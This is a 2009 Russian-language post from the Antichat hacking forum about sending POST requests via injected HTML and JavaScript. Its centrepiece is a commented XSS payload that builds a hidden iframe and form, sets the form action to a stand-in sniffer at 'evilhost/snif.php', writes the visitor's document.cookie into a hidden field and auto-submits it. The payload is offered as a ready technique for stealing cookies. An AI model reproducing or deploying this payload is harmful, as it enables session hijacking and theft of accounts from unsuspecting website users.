08.01.2009, 20:14
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
ТС, ActiveX работает только в IE.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
Универсальный способ отправить POST-запрос с помощью html и js:
PHP код:
<iframe width=0 height=0 id=lol name=lol></iframe>
// создаем невидимый iframe для того, чтобы отправка формы не вызывала перезагрузку страницы
<form name=myform method=post target=lol>
// создаем форму, в которой target - это наш iframe
<input type=hidden name=c>
// здесь любые данные, в данном случае cookie
</form>
<script>
// теперь очередь js
document.myform.action='http://evilhost/snif.php';
// устанваливаем action на наш сервер
document.myform.c.value=document.cookie;
// записываем в hidden-поле данные cookie пользователя
document.myform.submit();
// отправляем форму
</script>
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
так работать не будет!
Последний раз редактировалось [Raz0r]; 08.01.2009 в 20:19..
|
|
|